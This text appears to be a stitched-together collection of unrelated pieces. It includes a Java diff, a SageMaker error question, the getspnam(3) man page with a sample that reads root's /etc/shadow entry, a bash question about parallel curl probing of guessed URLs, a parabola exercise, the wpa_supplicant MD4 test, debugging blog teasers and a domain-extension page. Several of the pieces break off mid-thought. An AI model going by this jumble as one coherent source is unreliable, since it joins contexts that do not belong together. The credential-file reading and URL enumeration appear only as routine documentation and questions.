@@ -35,6 +32,8 @@ public final class Inicializador {
             default:
                 throw new RuntimeException("No se ha definido una acion " + algoritmo + " para la propiedad " + PropiedadesEnum.INICIALIZACION.getNombre());
         }
+        result.add(Generador.sol1());
+        result.add(Generador.sol2());
         result.parallelStream().forEach(e -> ProblemaControlador.getInstance().calculoDeFrecuencias(e));
         return result;
     }

GuiHelper.java
@@ -97,7 +97,7 @@ public final class GuiHelper {
         lblEstado.setText("");
         Individuo best = AEControlador.getInstance().getBest();
         if (best != null) {
             individuo = best.getAristas();
             String tiempo = AEControlador.getInstance().getTime();
             int gen = AEControlador.getInstance().getGeneracion();
             String frecs = best.getLineas().stream().map(l -> l.getFrecuencia() + "").collect(Collectors.joining("-"));
@@ -205,6 +205,18 @@ public final class GuiHelper {
             g.fillOval(x - 1, y - 1, 1, 1);
         });

+//        java.util.List<Parada> coordEspeciales = ProblemaControlador.getInstance().getCoordEspeciales();
+//        g.setColor(Color.green);
+//        coordEspeciales.forEach((parada) -> {
+//
+//            final int x = ((int) (parada.getCoordX().intValue() * propX)) + 10;
+//            final int y = (int) mapa.getSize().getHeight() - (((int) (parada.getCoordY().intValue() * propY))) - 10;
+//
+//            g.drawOval(x - 3, y - 3, 7, 7);
+//            g.fillOval(x - 3, y - 3, 7, 7);
+//
+//        });

         return g;
     }

Principal.java
@@ -561,6 +561,10 @@ public final class Principal extends javax.swing.JFrame {
         Path path = Paths.get(pathPlace + "\\" + "individuo.txt");

         try (BufferedWriter writer = Files.newBufferedWriter(path)) {
+//            for (Linea l : GuiHelper.sol1().getLineas()) {
+//                String line = l.getNodos().stream().map(e -> e + "").collect(Collectors.joining("\t", "", "\n"));
+//                writer.write(line);
+//            }
             for (Arista arista : individuo) {
                 writer.write(arista.getIdNodoA() + "\t");
                 writer.write(arista.getIdNodoB() + "\t");

Generador.java (new file)

package uy.edu.fing.lrt.modelo;

import uy.edu.fing.lrt.controlador.ProblemaControlador;
import uy.edu.fing.lrt.util.GlpkUtil;

import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;

public final class Generador {

    //Metodos estaticos
    private Generador() {
    }

    private void metodo() {
        Individuo individuo = Generador.sol1();
        Integer delay1 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 5, 4, Arista::getDelay))).getDelay() / 60;
        Integer delay2 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 5, 3, Arista::getDelay))).getDelay() / 60;
        Integer delay3 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 7, 3, Arista::getDelay))).getDelay() / 60;
        Integer delay4 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 7, 6, Arista::getDelay))).getDelay() / 60;
        Integer delay5 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 6, 2, Arista::getDelay))).getDelay() / 60;
        System.out.println();
    }

    private static Arista find(int a, int b) {
        return ProblemaControlador.getInstance().getArista(a, b);
    }

    private static Arista find(int a) {
        return ProblemaControlador.getInstance().getArista(a);
    }

    private static Linea build(int[] idAristas) {
        List<Arista> aristas = Arrays.stream(idAristas).mapToObj(Generador::find).collect(Collectors.toList());
        return new Linea(aristas);
    }

    private static Concentrador build(int[]... idAristas) {
        int size = idAristas.length;
        List<Linea> lineas = Arrays.stream(idAristas).map(Generador::build).collect(Collectors.toList());
        return new Concentrador(size, lineas);
    }

    private static Individuo buildI(int[] sizes, int[]... idAristas) {
        int start = 0;
        int end;
        Concentrador[] c = new Concentrador[sizes.length];
        for (int i = 0, sizesLength = sizes.length; i < sizesLength; i++) {
            int size = sizes[i];
            end = start + size;
            c[i] = build(Arrays.copyOfRange(idAristas, start, end));
            start = end;
        }
        return new Individuo(c);
    }

    public static Individuo sol1() {
        return buildI(new int[]{2, 2, 3, 2},
                new int[]{18, 32, 64, 6},
                new int[]{16, 29, 65, 21, 22, 68, 70, 72, 83, 10}, //ojo aca, no es 10, 12
                new int[]{20, 46, 48, 50, 52, 79, 11},
                new int[]{19, 45, 49, 51, 7},
                new int[]{21, 65, 62, 64, 6},
                new int[]{22, 68, 70, 72, 83, 10},
                new int[]{23, 89, 86, 87, 13},
                new int[]{27, 44, 45, 49, 52, 79, 11},
                new int[]{26, 42, 50, 51, 7}
        );
    }

    public static Individuo sol2() {
        return buildI(new int[]{2, 2, 3, 2},
                new int[]{18, 32, 64, 6},
                new int[]{16, 29, 65, 21, 22, 68, 70, 72, 83, 12}, //ojo aca, no es 10, 12
                new int[]{20, 46, 48, 50, 52, 79, 11},
                new int[]{19, 45, 49, 51, 7},
                new int[]{21, 65, 62, 64, 6},
                new int[]{22, 68, 70, 72, 83, 12},
                new int[]{23, 89, 86, 87, 13},
                new int[]{27, 44, 45, 49, 52, 79, 11},
                new int[]{26, 42, 50, 51, 7}
        );
    }
}

Parada.java
@@ -35,6 +35,12 @@ public final class Parada {
         return nombre;
     }

+    public static String calcOriginalCoords(double coordX, double coordY) {
+        double x = (coordX + 36775.622427676) / 0.0648407565611663;
+        double y = (coordY + 397188.171216462) / 0.0647443036353733;
+        return x + "\t" + y;
+    }
+
     @Override
     public String toString() {
         return nombre + "(" + coordX + ", " + coordY + ")";
Unable to deploy to SageMaker via Studio notebook Kernel specifications: Image: Data Science 3.0 Kernel: Python 3 Instance type: ml.t3.medium Start-up script: No script This is my exact notebook code, copied from the “Deploy” button on https://huggingface.co/HuggingFaceM4/idefics-80b: import sagemaker from sagemaker.huggingface import HuggingFaceModel role = sagemaker.get_execution_role() # Hub Model configuration. https://huggingface.co/models hub = { 'HF_MODEL_ID':'HuggingFaceM4/idefics-80b', 'HF_TASK':'text-generation' } # create Hugging Face Model Class huggingface_model = HuggingFaceModel( transformers_version='4.26.0', pytorch_version='1.13.1', py_version='py39', env=hub, role=role, ) # deploy model to SageMaker Inference predictor = huggingface_model.deploy( initial_instance_count=1, # number of instances instance_type='ml.m5.xlarge' # ec2 instance type ) data = { "inputs": "Can you please let us know more details about your " } predictor.predict(data) I am able to deploy the model and I can see the endpoint. However, running the predict method always throws this error: ModelError Traceback (most recent call last) Cell In[17], line 1 ----> 1 predictor.predict(data) File /opt/conda/lib/python3.10/site-packages/sagemaker/base_predictor.py:185, in Predictor.predict(self, data, initial_args, target_model, target_variant, inference_id, custom_attributes) 138 """Return the inference from the specified endpoint. 139 140 Args: (...) 174 as is. 175 """ 177 request_args = self._create_request_args( 178 data, 179 initial_args, (...) 183 custom_attributes, 184 ) --> 185 response = self.sagemaker_session.sagemaker_runtime_client.invoke_endpoint(**request_args) 186 return self._handle_response(response) File /opt/conda/lib/python3.10/site-packages/botocore/client.py:535, in ClientCreator._create_api_method.<locals>._api_call(self, *args, **kwargs) 531 raise TypeError( 532 f"{py_operation_name}() only accepts keyword arguments." 533 ) 534 # The "self" in this scope is referring to the BaseClient. --> 535 return self._make_api_call(operation_name, kwargs) File /opt/conda/lib/python3.10/site-packages/botocore/client.py:980, in BaseClient._make_api_call(self, operation_name, api_params) 978 error_code = parsed_response.get("Error", {}).get("Code") 979 error_class = self.exceptions.from_code(error_code) --> 980 raise error_class(parsed_response, operation_name) 981 else: 982 return parsed_response ModelError: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (400) from primary with message "{ "code": 400, "type": "InternalServerException", "message": "\u0027idefics\u0027" } ". What can I do to fix this issue and properly invoke the endpoint?
getspnam(3) - phpMan

GETSPNAM(3)                Linux Programmer's Manual                GETSPNAM(3)

NAME
       getspnam, getspnam_r, getspent, getspent_r, setspent, endspent,
       fgetspent, fgetspent_r, sgetspent, sgetspent_r, putspent, lckpwdf,
       ulckpwdf - get shadow password file entry

SYNOPSIS
       /* General shadow password file API */
       #include <shadow.h>

       struct spwd *getspnam(const char *name);

       struct spwd *getspent(void);

       void setspent(void);

       void endspent(void);

       struct spwd *fgetspent(FILE *fp);

       struct spwd *sgetspent(const char *s);

       int putspent(struct spwd *p, FILE *fp);

       int lckpwdf(void);

       int ulckpwdf(void);

       /* GNU extension */
       #include <shadow.h>

       int getspent_r(struct spwd *spbuf,
               char *buf, size_t buflen, struct spwd **spbufp);

       int getspnam_r(const char *name, struct spwd *spbuf,
               char *buf, size_t buflen, struct spwd **spbufp);

       int fgetspent_r(FILE *fp, struct spwd *spbuf,
               char *buf, size_t buflen, struct spwd **spbufp);

       int sgetspent_r(const char *s, struct spwd *spbuf,
               char *buf, size_t buflen, struct spwd **spbufp);

   Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

       getspent_r(), getspnam_r(), fgetspent_r(), sgetspent_r():
           _BSD_SOURCE || _SVID_SOURCE

DESCRIPTION
       Long ago it was considered safe to have encrypted passwords openly
       visible in the password file. When computers got faster and people got
       more security-conscious, this was no longer acceptable. Julianne
       Frances Haugh implemented the shadow password suite that keeps the
       encrypted passwords in the shadow password database (e.g., the local
       shadow password file /etc/shadow, NIS, and LDAP), readable only by
       root.

       The functions described below resemble those for the traditional
       password database (e.g., see getpwnam(3) and getpwent(3)).

       The getspnam() function returns a pointer to a structure containing
       the broken-out fields of the record in the shadow password database
       that matches the username name.

       The getspent() function returns a pointer to the next entry in the
       shadow password database. The position in the input stream is
       initialized by setspent(). When done reading, the program may call
       endspent() so that resources can be deallocated.

       The fgetspent() function is similar to getspent() but uses the
       supplied stream instead of the one implicitly opened by setspent().

       The sgetspent() function parses the supplied string s into a struct
       spwd.

       The putspent() function writes the contents of the supplied struct
       spwd *p as a text line in the shadow password file format to the
       stream fp. String entries with value NULL and numerical entries with
       value -1 are written as an empty string.

       The lckpwdf() function is intended to protect against multiple
       simultaneous accesses of the shadow password database. It tries to
       acquire a lock, and returns 0 on success, or -1 on failure (lock not
       obtained within 15 seconds). The ulckpwdf() function releases the lock
       again. Note that there is no protection against direct access of the
       shadow password file. Only programs that use lckpwdf() will notice the
       lock.

       These were the functions that formed the original shadow API. They are
       widely available.

   Reentrant versions
       Analogous to the reentrant functions for the password database, glibc
       also has reentrant functions for the shadow password database. The
       getspnam_r() function is like getspnam() but stores the retrieved
       shadow password structure in the space pointed to by spbuf. This
       shadow password structure contains pointers to strings, and these
       strings are stored in the buffer buf of size buflen. A pointer to the
       result (in case of success) or NULL (in case no entry was found or an
       error occurred) is stored in *spbufp.

       The functions getspent_r(), fgetspent_r(), and sgetspent_r() are
       similarly analogous to their non-reentrant counterparts.

       Some non-glibc systems also have functions with these names, often
       with different prototypes.

   Structure
       The shadow password structure is defined in <shadow.h> as follows:

           struct spwd {
               char *sp_namp;          /* Login name */
               char *sp_pwdp;          /* Encrypted password */
               long  sp_lstchg;        /* Date of last change
                                          (measured in days since
                                          1 Jan 1970) */
               long  sp_min;           /* Min # of days between changes */
               long  sp_max;           /* Max # of days between changes */
               long  sp_warn;          /* # of days before password expires
                                          to warn user to change it */
               long  sp_inact;         /* # of days after password expires
                                          until account is disabled */
               long  sp_expire;        /* Date when account expires
                                          (measured in days since
                                          1 Jan 1970) */
               unsigned long sp_flag;  /* Reserved */
           };

RETURN VALUE
       The functions that return a pointer return NULL if no more entries are
       available or if an error occurs during processing. The functions which
       have int as the return value return 0 for success and -1 for failure.

       For the non-reentrant functions, the return value may point to a
       static area, and may be overwritten by subsequent calls to these
       functions.

       The reentrant functions return zero on success. In case of error, an
       error number is returned.

ERRORS
       ERANGE Supplied buffer is too small.

FILES
       /etc/shadow
              local shadow password database file

       /etc/.pwd.lock
              lock file

       The include file <paths.h> defines the constant _PATH_SHADOW to the
       pathname of the shadow password file.

CONFORMING TO
       The shadow password database and its associated API are not specified
       in POSIX.1-2001. However, many other systems provide a similar API.

SEE ALSO
       getgrnam(3), getpwnam(3), getpwnam_r(3), shadow(5)

COLOPHON
       This page is part of release 3.22 of the Linux man-pages project. A
       description of the project, and information about reporting bugs, can
       be found at http://www.kernel.org/doc/man-pages/.

GNU                               2008-07-09                       GETSPNAM(3)
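As a quick illustration (not part of the man page itself), a minimal program using getspnam() might look like the sketch below. It has to run as root, or with equivalent privileges, because /etc/shadow is readable only by root.

#include <shadow.h>
#include <stdio.h>

int main(void)
{
    /* Look up the shadow entry for root; requires privileges. */
    struct spwd *sp = getspnam("root");

    if (sp == NULL) {
        perror("getspnam");
        return 1;
    }

    printf("login name : %s\n", sp->sp_namp);
    printf("last change: %ld days since 1 Jan 1970\n", sp->sp_lstchg);
    return 0;
}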
Answer to Question #15602 in Discrete Mathematics for Sujata Roy

Question #15602

Formula to determine the number of connected components of a graph G.

Expert's answer

There isn't a common formula to determine the number of connected components of an arbitrary graph. You can find the number of connected components algorithmically.

Comments

Assignment Expert, 10.10.12, 16:18

It is straightforward to compute the connected components of a graph in linear time (in terms of the numbers of the vertices and edges of the graph) using either breadth-first search or depth-first search. In either case, a search that begins at some particular vertex v will find the entire connected component containing v (and no more) before returning. To find all the connected components of a graph, loop through its vertices, starting a new breadth-first or depth-first search whenever the loop reaches a vertex that has not already been included in a previously found connected component.

There are also efficient algorithms to dynamically track the connected components of a graph as vertices and edges are added, as a straightforward application of disjoint-set data structures. These algorithms require amortized O(α(n)) time per operation, where adding vertices and edges and determining the connected component in which a vertex falls are both operations, and α(n) is a very slowly growing inverse of the very quickly growing Ackermann function.

A related problem is tracking connected components as all edges are deleted from a graph, one by one; an algorithm exists to solve this with constant time per query, and O(|V||E|) time to maintain the data structure; this is an amortized cost of O(|V|) per edge deletion. For forests, the cost can be reduced to O(q + |V| log |V|), or O(log |V|) amortized cost per edge deletion.

Sujata Roy, 07.10.12, 10:37

Then sir please tell me about the algorithm.
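To make the loop-over-vertices idea concrete, here is a short sketch (not part of the original answer) that counts components with breadth-first search. The graph is assumed to be given as an adjacency-list dictionary.

from collections import deque

def count_components(adj):
    """Count connected components of an undirected graph.

    adj maps each vertex to an iterable of its neighbours.
    Runs in O(|V| + |E|) time, as described above.
    """
    seen = set()
    components = 0
    for start in adj:
        if start in seen:
            continue
        components += 1          # found a new, unvisited component
        seen.add(start)
        queue = deque([start])
        while queue:             # BFS covers the whole component
            v = queue.popleft()
            for w in adj[v]:
                if w not in seen:
                    seen.add(w)
                    queue.append(w)
    return components

# Example: vertices 1 and 2 are linked, vertex 3 is isolated -> prints 2
print(count_components({1: [2], 2: [1], 3: []}))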
Kent Fredric 🔥🐶🍵🔥 and 1 contributor

NAME

CPAN::Changes::Markdown::Filter::Node::PlainText - A text node that contains markup-free text.

VERSION

version 1.000002

SYNOPSIS

    use CPAN::Changes::Markdown::Filter::NodeUtil qw( :all );

    my $plaintext = mk_node_plaintext("The text here");

    $plaintext->to_s()    # The text here
    $plaintext->content() # The text here

METHODS

create

Slightly shorter hand for new:

    $class->create( $text ) == $class->new( content => $text )

to_s

Represent this node back as text.

ATTRIBUTES

content

rw, required

AUTHOR

Kent Fredric <[email protected]>

COPYRIGHT AND LICENSE

This software is copyright (c) 2017 by Kent Fredric <[email protected]>.

This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself.
Excel Formula: Find Exact Value in 9th Column

Formula: Find an exact value when you have 1 reference and a table to look in, where the value is found in the 9th column of the table.

Formula Generator | 9 months ago

You can use the VLOOKUP function in Google Sheets (the same formula works in Excel) to find an exact value when you have 1 reference and a table to look in. This formula is particularly useful when you want to retrieve a value from the 9th column of a table: VLOOKUP matches the reference against the first column of the table and returns the value from the 9th column of the matching row. To use this formula, you need to provide the reference, the table range, the column index number, and specify an exact match. Let's explore how to use the VLOOKUP function with examples.

Here is the formula:

=VLOOKUP(reference, table, 9, FALSE)

Explanation:

1. reference is the value you want to look up in the first column of the table. This can be a cell reference or a specific value.
2. table is the range of cells that contains the table you want to search in. The table should have at least 9 columns.
3. 9 represents the column index number where the value you want to retrieve is located, counted from the first column of the table range. In this case, it is the 9th column.
4. FALSE indicates that you want an exact match. If the value is not found exactly, the formula will return an error.

Examples:

Let's say you have the following table:

|   A   |   B   |   C   |   D   |   E   |   F   |   G   |   H   |   I   |
|-------|-------|-------|-------|-------|-------|-------|-------|-------|
|   1   |   2   |   3   |   4   |   5   |   6   |   7   |   8   |   9   |
|  Cat  |  Dog  |  Cow  |  Pig  |  Rat  |  Bat  |  Ant  |  Bee  |  Cow  |
| Lion  | Tiger | Horse | Zebra | Bear  | Lion  | Wolf  |  Fox  | Lion  |

If you want to find the 9th-column value in the row whose first column is "Cat", you can use the formula:

=VLOOKUP("Cat", A1:I3, 9, FALSE)

This formula will return "Cow", because the row that starts with "Cat" has "Cow" in its 9th column.

If you look up "Lion" instead:

=VLOOKUP("Lion", A1:I3, 9, FALSE)

This formula will return "Lion", the 9th-column value of the row that starts with "Lion".

If you look up a value that does not exist in the first column:

=VLOOKUP("Elephant", A1:I3, 9, FALSE)

This formula will return an #N/A error, because "Elephant" is not found in the first column of the table.

This article was generated with AI. AI can make mistakes, consider checking important information.
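As an aside (not covered in the original article), VLOOKUP can only search the first column of the table. When the lookup value lives in a different column, a common alternative is INDEX/MATCH, which decouples the match column from the return column:

=INDEX(I1:I3, MATCH("Dog", B1:B3, 0))

Here MATCH finds the row where column B equals "Dog" (row 2), and INDEX returns the corresponding value from column I, so this returns "Cow".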
I'd like to do this script in bash, so I can understand it and write it in Python (which I know much less) later.

I have some files in data. 3, nothing more.

https://www.example.com/data/file27-1.jpg
https://www.example.com/data/file51-2.jpg
https://www.example.com/data/file2576-3.jpg

URL='https://www.example.com/data/file'
i=1 ; j=1
for i in {1..3000} ; do
    curl -I ${URL}${i}-${j}.jpg
    # here, pipe result into grep,
    ### if !200, ((i++)) (so do nothing);
    ### if 200, wget the file and ((j++)), and i=i-1 so I can have the same $i at the next loop, for an incremented $j,
    # and go on into the for loop
done

But curling 3000 links one by one takes some time. I'd like to parallelize the curl -I requests in some way, and when I get a 200 response, stop all the requesting processes (as there won't be two files with the same $j value), add 1 to $j, take everything back to the appropriate $i and $j values, and go on.

I'm stuck at parallelizing (I found many threads on it), but the part that really blocks me is how a 200 would kill all curl processes and then resume at the $i and $j values that gave the 200 OK. I hope I've been clear. I didn't write a sample script yet; I'm looking into methods of achieving it. Thanks

Edit:

ps -ax | grep "curl" | grep -v "grep" | awk '{print $1}' | xargs kill -9

I figured out I can use that command to kill all curl requests, which I can use in an if-200 condition, then re-set the $i value with i=i-1, increment $j, and go on in the loop. But at this stage, nothing is parallelized: I can see how, with xargs, I can run curl requests in parallel, but I can't increment the loop variables while doing so. I'm thinking of a temporary file with the URLs generated in it, but I'd rather have them generated as the script goes.

2 Answers

Here is a little snippet that can help you along with what you are trying to do; I hope the logic is fine:

#!/bin/bash

i=0
j=0
pid=0
ppid=0

# Enable job control; it's not used here but it can be useful if you need to do more job control
set -m

for i in {1..3000} ; do
    # Execute each curl in the background to get a sort of multi-threading; grab the
    # HEAD response status and put it in file descriptor 3 to be gathered later
    exec 3< <(curl -I ${URL}${i}-${j}.jpg | head -n 1 | cut -d$' ' -f2)

    # Get the pid of the background job
    pid="$!"

    # Get the parent pid of the background job
    ppid="$(ps -o ppid= -p $pid)"

    # Gather the HTTP response code
    status="$(cat <&3)"

    # Check
    if [ "$status" -eq 200 ] ; then
        i="$(($i - 1))"
        j="$(($j + 1))"
        echo "kill all previous background processes by their parent"
        pkill -P $ppid
    else
        i="$(($i + 1))"
    fi

    echo " status : $status"
    echo " parent : $ppid"
    echo " child  : $pid"
done

Comments:

Oh my! I just looked into it. I haven't tested it as-is since I have some more things to do with the vars, but it has all the kinds of features I'd need (format date for i, hash for j...). I would edit your answer to put pkill before the i and j changes in if [ "$status" -eq 200 ] though, so background processes won't change them in the short meantime. Also, as I read your code, I have some difficulty understanding how the [if] part would be in the background; I understand only the curl for the current loop is, isn't it? I won't mark the topic answered for now, but I give you an "up" for that! Thanks. Commented Dec 15, 2020 at 21:39

I see. Normally the script should work correctly. The [if] statement is in the foreground, but it will be executed on each iteration and the <status> variable will get the response every time a background job ends. – Reda Salih, Commented Dec 15, 2020 at 22:07

If you have GNU Parallel, something like this should work (i=1..3000; j=1..1000):

do_j() {
    j=$1
    URL='https://www.example.com/data/file'
    seq 3000 | parallel --halt soon,success=1 -j100 "curl -I ${URL}{}-${j}.jpg | grep 'HTTP.* 200 OK'"
}
export -f do_j

seq 1000 | parallel -j1 do_j

Adjust -j1 and -j100 to get more or fewer in parallel.
Problem on the parabola

1) Find the equation of the parabola with vertex V(2, 2) passing through A(4, 0).
2) Find the equations of the lines tangent to the parabola at its points of intersection with the x-axis.
3) Let P be the intersection point of the lines found in part 2; compute the area of triangle OPA.
4) Compute the length of the chord cut on the parabola by the line $y = -x$.
5) Sketch the graph.

Solution

1) Vertex form of the parabola: $y = a(x - 2)^2 + 2$. Substituting the coordinates of A:
$0 = a(4 - 2)^2 + 2 \Rightarrow a = -\tfrac{1}{2}$.
Equation of the parabola: $y = -\tfrac{1}{2}x^2 + 2x$.

2) Intersections with the x-axis: $-\tfrac{1}{2}x^2 + 2x = 0 \Rightarrow x_{1,2} = 0,\, 4$, i.e. O(0, 0) and A(4, 0).

Tangent through A: intersect $y = m(x - 4)$ with the parabola:
$-\tfrac{1}{2}x^2 + 2x = mx - 4m \Rightarrow \tfrac{1}{2}x^2 + (m - 2)x - 4m = 0$.
Tangency requires the discriminant to vanish:
$(m - 2)^2 + 8m = 0 \Rightarrow m^2 + 4m + 4 = 0 \Rightarrow (m + 2)^2 = 0 \Rightarrow m = -2$.
Tangent through A: $y = -2x + 8$.

Tangent through O: intersect $y = mx$ with the parabola:
$-\tfrac{1}{2}x^2 + 2x = mx \Rightarrow \tfrac{1}{2}x^2 + (m - 2)x = 0$.
Setting the discriminant to zero: $(m - 2)^2 = 0 \Rightarrow m = 2$.
Tangent through O: $y = 2x$.

3) Coordinates of P: solving $y = 2x$ together with $y = -2x + 8$ gives P(2, 4).
Area of the triangle: base $OA = 4$, height $PH = 4$, so the area is $\tfrac{1}{2} \cdot 4 \cdot 4 = 8$.

4) Endpoints of the chord: $-\tfrac{1}{2}x^2 + 2x = -x \Rightarrow -\tfrac{1}{2}x^2 + 3x = 0 \Rightarrow x_{1,2} = 0,\, 6$, i.e. O(0, 0) and C(6, -6).
Length of segment OC: $\overline{OC} = \sqrt{(6 - 0)^2 + (-6 - 0)^2} = \sqrt{72} = 6\sqrt{2} \approx 8.49$.
path: root/wpa_supplicant/tests/test_md4.c

/*
 * Test program for MD4 (test vectors from RFC 1320)
 * Copyright (c) 2006, Jouni Malinen <[email protected]>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 *
 * Alternatively, this software may be distributed under the terms of BSD
 * license.
 *
 * See README and COPYING for more details.
 */

#include "includes.h"
#include "common.h"
#include "crypto/crypto.h"

int main(int argc, char *argv[])
{
	struct {
		char *data;
		u8 *hash;
	} tests[] = {
		{
			"",
			"\x31\xd6\xcf\xe0\xd1\x6a\xe9\x31"
			"\xb7\x3c\x59\xd7\xe0\xc0\x89\xc0"
		},
		{
			"a",
			"\xbd\xe5\x2c\xb3\x1d\xe3\x3e\x46"
			"\x24\x5e\x05\xfb\xdb\xd6\xfb\x24"
		},
		{
			"abc",
			"\xa4\x48\x01\x7a\xaf\x21\xd8\x52"
			"\x5f\xc1\x0a\xe8\x7a\xa6\x72\x9d"
		},
		{
			"message digest",
			"\xd9\x13\x0a\x81\x64\x54\x9f\xe8"
			"\x18\x87\x48\x06\xe1\xc7\x01\x4b"
		},
		{
			"abcdefghijklmnopqrstuvwxyz",
			"\xd7\x9e\x1c\x30\x8a\xa5\xbb\xcd"
			"\xee\xa8\xed\x63\xdf\x41\x2d\xa9"
		},
		{
			"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
			"0123456789",
			"\x04\x3f\x85\x82\xf2\x41\xdb\x35"
			"\x1c\xe6\x27\xe1\x53\xe7\xf0\xe4"
		},
		{
			"12345678901234567890123456789012345678901234567890"
			"123456789012345678901234567890",
			"\xe3\x3b\x4d\xdc\x9c\x38\xf2\x19"
			"\x9c\x3e\x7b\x16\x4f\xcc\x05\x36"
		}
	};
	unsigned int i;
	u8 hash[16];
	const u8 *addr[2];
	size_t len[2];
	int errors = 0;

	for (i = 0; i < sizeof(tests) / sizeof(tests[0]); i++) {
		printf("MD4 test case %d:", i);

		/* Hash the whole test string in a single chunk. */
		addr[0] = (const u8 *) tests[i].data;
		len[0] = strlen(tests[i].data);
		md4_vector(1, addr, len, hash);
		if (memcmp(hash, tests[i].hash, 16) != 0) {
			printf(" FAIL");
			errors++;
		} else
			printf(" OK");

		if (len[0]) {
			/* Hash the same data again, split across two chunks,
			 * to exercise the multi-element vector path. */
			addr[0] = (const u8 *) tests[i].data;
			len[0] = 1;
			addr[1] = (const u8 *) tests[i].data + 1;
			len[1] = strlen(tests[i].data) - 1;
			md4_vector(2, addr, len, hash);
			if (memcmp(hash, tests[i].hash, 16) != 0) {
				printf(" FAIL");
				errors++;
			} else
				printf(" OK");
		}

		printf("\n");
	}

	return errors;
}
9. Managing Your Library

In the last chapter, we covered concepts and tasks that enhance your listening and viewing experience. In this chapter, we move to those topics that impact what happens in iTunes when you're not playing anything but, rather, when you're organizing, searching, updating, or otherwise managing your library.

A song is not just music (and podcasts and audiobooks are not just spoken words); each item in your library has information associated with it. This information affects how things look, how you can find specific content, and how files are stored on your hard drive. Thus, in this chapter we cover the ins and outs of how your library "works": the important role of song information, how you can edit that information, and ...
Setting user mode breakpoints from KD, aka .process /i vs .process /r /p

When performing KD (kernel debugging) in Windows with WinDbg, if you have to set a breakpoint in a user mode process you should always use .process /i address; g; .reload /user. A lot of good content has been written on the internet about this command, but nothing seemed to explain why it should be used instead of the familiar .process /r /p address. I would like to shed some light on this. Before reading any further, I would strongly encourage you to read about it from the above link. In this article I assume some basic knowledge of how kernel debugging is done with WinDbg. Also, I would like to start with the following question: if the debugger has read/write access to the user mode process via .process /r /p, why can't it insert int 3 in the user mode process when performing KD? Why do we have to make the user mode process the current process context by running .process /i? Read on →

How do breakpoints work in debuggers?

It's been a while since I had a chance to blog about low-level stuff. In this article, I am going to explain how breakpoints work in debuggers. I am assuming the reader is already familiar with what a breakpoint is and how to set one in your debugger of choice. The goal of this post is to explain the interplay between the debugger, the debuggee, the operating system and the CPU. Read on →

A newbie's introduction to compilers and reverse engineering

Compilers are surely among the most complex programs of all time. Even today, writing a compiler with a minimum set of tools is considered challenging. This tutorial scratches the surface of the different compiler phases involved in translating a given source code to an executable, and also shows how this information is useful in the context of reverse engineering. I tried my best not to confuse the reader with too much jargon, and to help any newbie get up to speed. Read on →

What does it take to write an emulator in Java?

I am proud: this weekend I did some productive work. I was able to code a Chip-8 emulator in Java over a night 😉 I have always been fascinated by emulators, and finally I was able to get the damn thing to work! For those of you who are not familiar with software emulators, an emulator is software that can emulate the functionality of other hardware or software components. Notable examples are video game emulators (DOSBox, NES emulators) and general purpose emulators (QEMU). Read on →
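To give a flavor of what the core of such an emulator looks like, here is a minimal fetch-decode sketch (my own illustration, not code from the original post). Chip-8 opcodes are two bytes, big-endian, and programs are conventionally loaded at address 0x200.

public class Chip8 {
    private final int[] memory = new int[4096]; // 4 KB of RAM
    private final int[] v = new int[16];        // registers V0..VF
    private int pc = 0x200;                     // programs start at 0x200

    /** Run one fetch-decode-execute step. */
    void step() {
        // Fetch: each opcode is two bytes, big-endian.
        int opcode = (memory[pc] << 8) | memory[pc + 1];
        pc += 2;

        // Decode on the high nibble; only two opcodes sketched here.
        switch (opcode & 0xF000) {
            case 0x6000: // 6XNN: set VX = NN
                v[(opcode & 0x0F00) >> 8] = opcode & 0x00FF;
                break;
            case 0x1000: // 1NNN: jump to address NNN
                pc = opcode & 0x0FFF;
                break;
            default:
                throw new IllegalStateException(
                        String.format("Unhandled opcode %04X", opcode));
        }
    }
}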
[texhax] Referencing a section title Luis Alejandro Cortes luico at ida.liu.se Fri Sep 10 09:28:16 CEST 2004 Dear all, I need to make a reference to the title of a section (not just its number). If I have \section{NiceTitle} \label{sec:mysection} it is clear that \ref{sec:mysection} produces the number of the section. But what if I want to get the title itself? I want of course to avoid doing it manually (retyping 'NiceTitle' in the part of the text I need it). /LAC More information about the texhax mailing list
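A common way to do this in practice (not part of the original message) is the nameref package, which records section titles so they can be recalled by label:

\usepackage{nameref}

% ...

\section{NiceTitle}
\label{sec:mysection}

% Later in the text:
Section~\ref{sec:mysection} (\nameref{sec:mysection}) discusses this.
% -> "Section 1 (NiceTitle) discusses this."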
.center domain

Domain extensions, also known as top-level domains (TLDs), are the suffixes at the end of a web address. Some of the most well-known ones are .com, .org or .net. TLDs are important because they help define the purpose or nature of a website and contribute to the overall identity of a web address.

The .center domain extension was introduced in 2014 to provide an additional TLD that could be used for a variety of purposes. It serves as an inclusive platform for diverse content, accommodating various industries, communities or entities seeking a central online presence. This is a great choice if your .com, .org and .net domain name is already taken.

Why use the .center domain extension?

Versatility: .center is versatile and can be used for various types of websites, making it suitable for businesses, organizations or individuals.

Memorability: It can help make a web address more memorable by providing a clear indication of the central theme or focus of the website.

Who uses the .center domain extension?

The .center TLD is designed to cater to various purposes and doesn't confine itself to any specific industry or niche. Here are some examples of the ways it can be used:

• Businesses or organizations that want to emphasize a central location or focus.
• Educational institutions or training centers.
• Convention centers, function rooms or event halls.
• Event organizing companies.

How to register .center

01. Choose a domain registrar
Select a domain registrar like Wix that offers registration services for .center domains.

02. Check for availability
Use the registrar's domain name search tool to check if your desired .center domain is available.

03. Submit your information
Complete the registration process by providing any necessary information, including contact details.

04. Complete payment
Make the required payment to complete the registration process.

.center domain extension FAQ

Can I use .center for any type of website?
Yes, .center is versatile and can be used for various purposes, including businesses, organizations and personal websites.

How does .center differ from .com?
.center is often more specific, indicating a central theme or hub, while .com is a general-purpose domain widely used for commercial websites.

Are there any restrictions on registering a .center domain?
Generally, .center has no specific restrictions, but individual registrars may have their own policies.

Can I transfer an existing .center domain to another registrar?
